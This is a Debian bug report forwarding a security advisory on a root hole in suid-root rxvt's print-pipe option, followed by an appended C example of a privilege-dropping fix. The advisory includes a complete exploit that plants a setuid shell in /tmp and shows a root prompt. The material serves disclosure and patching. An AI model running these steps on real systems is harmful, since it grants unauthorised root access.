
Bug#2147: rxvt security hole



Package: rxvt
Version: 2.10-1

    There is a very serious bug that can grant root access through the
use of a suid root rxvt.  The affected program is included in both
the development and stable releases.  I tried it on my system and it took
less than one minute to gain root access from a normal user account.
Attached is the post to comp.os.linux.announce regarding this problem.


[This was recently forwarded over the linux-alert mailing list.  I left
the full text of the exploit in this post due to the fact that it is
already quite well publicized.  I have not verified the exploit code
myself.  --Jeff.]

   There is a major security hole in rxvt, a terminal emulator for X, when it
is run on systems suid root, as is required on many configurations in order to
write to the utmp file.  It is obvious from the code that this program was
not written to be run suid root; it's a pity that sysadmins that install the
compiled versions of this sort of code don't see the same warnings of 'run
suid root at your own risk' that the people that put together a distribution
with it that way see in the makefile.
   The conditions that allow this particular hole to be exploited are rxvt
compiled with the PRINT_PIPE option, and running suid root.  The program
sets the pipe to "lpr", without a pathname, but it's even easier than that
to exploit because we can set the pipe to whatever we want with the -print-pipe
option on the rxvt command line.  Although the program gives up its root
privileges when forking to run a shell or other command, the original program
continues running suid root for the entire execution of the program.
   Because the popen() call runs as root, whatever program that pipe opens
will execute immediately as root.  In order to start the printer pipe, the
vt100 printer-on command is ESC[5i.  The pipe can then be closed with the
printer-off command, ESC[4i.  Exploiting this is extremely easy.

                   Program: rxvt
Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with
                            rxvt suid root (and compiled with PRINT_PIPE)
              Requirements: account on system, X server
           Temporary Patch: chmod -s /usr/X11R6/bin/rxvt
       Security Compromise: root
                    Author: Dave M. (davem@cmu.edu)
                  Synopsis: rxvt fails to give up root privileges before
                            opening a pipe to a program that can be specified
                            by the user.


Exploit:
1.  Set DISPLAY environment variable if necessary so you can use x clients.
2.  In user shell:
    $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
    $ chmod +x /tmp/rxbug
    $ rxvt -print-pipe /tmp/rxbug
3.  In rxvt xclient:
    $ cat
      ESC[5i
      ESC[4i
    (The client will close at this point with a broken pipe)
4.  $ /tmp/rxsh
    # whoami
    root
    #


------------------------------------------------------------------------
The normal moderators for this newsgroup (Matt Welsh and Lars Wirzenius)
were bypassed for this announcement; we (Olaf Kirch and Jeff Uphoff)
have their implicit approval for security announcements, by prior
arrangement.
------------------------------------------------------------------------
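As an added example (not rxvt's own code, and not the Debian fix), this is the shape of the correction the synopsis above calls for: instead of popen(), the print pipe is opened with fork(), the child permanently drops to the real uid/gid and verifies root cannot be regained, and only then execs the user-supplied command, so a -print-pipe value never runs as root. Function names and the sample commands in the usage are assumptions for illustration.

```c
/* Added example (not rxvt's code): open a user-chosen print pipe from a
 * setuid-root process without letting the command inherit root. */
#define _GNU_SOURCE
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <grp.h>

/* Permanently drop to the real uid/gid. Returns 0 on success, -1 if a
 * step fails or if root could still be regained afterwards. */
int drop_privileges_permanently(void)
{
    uid_t ruid = getuid(); gid_t rgid = getgid();
    if (geteuid() == 0 && setgroups(0, NULL) != 0) return -1; /* root only */
    if (setgid(rgid) != 0) return -1;  /* gid first: changing it needs root */
    if (setuid(ruid) != 0) return -1;  /* as root this sets real+eff+saved */
    if (ruid != 0 && setuid(0) == 0) return -1; /* drop must be irreversible */
    return (getuid() == ruid && geteuid() == ruid) ? 0 : -1;
}

/* Like popen(cmd, "w"), but the child gives up root before exec. Returns
 * the write end of the pipe (or -1) and stores the child's pid in *pid. */
int spawn_print_pipe(const char *cmd, pid_t *pid)
{
    int fds[2]; if (pipe(fds) != 0) return -1;
    *pid = fork();
    if (*pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (*pid == 0) {
        if (drop_privileges_permanently() != 0) _exit(127); /* never as root */
        if (dup2(fds[0], STDIN_FILENO) < 0) _exit(127);
        close(fds[0]); close(fds[1]);
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    close(fds[0]); return fds[1];
}

/* Feed `text` to the print command and return its exit code (-1 on error). */
int print_via_pipe(const char *cmd, const char *text)
{
    pid_t pid;
    int fd = spawn_print_pipe(cmd, &pid), status;
    if (fd < 0) return -1;
    /* a command that exits without reading makes this write fail (EPIPE) */
    if (write(fd, text, strlen(text)) < 0) { /* nothing more to send */ }
    close(fd);
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Run from an unprivileged account the drop is a no-op and the checks still pass; run setuid root, the child can no longer reach root after exec, which is exactly what the "Temporary Patch" (chmod -s) achieves by removing the privilege altogether.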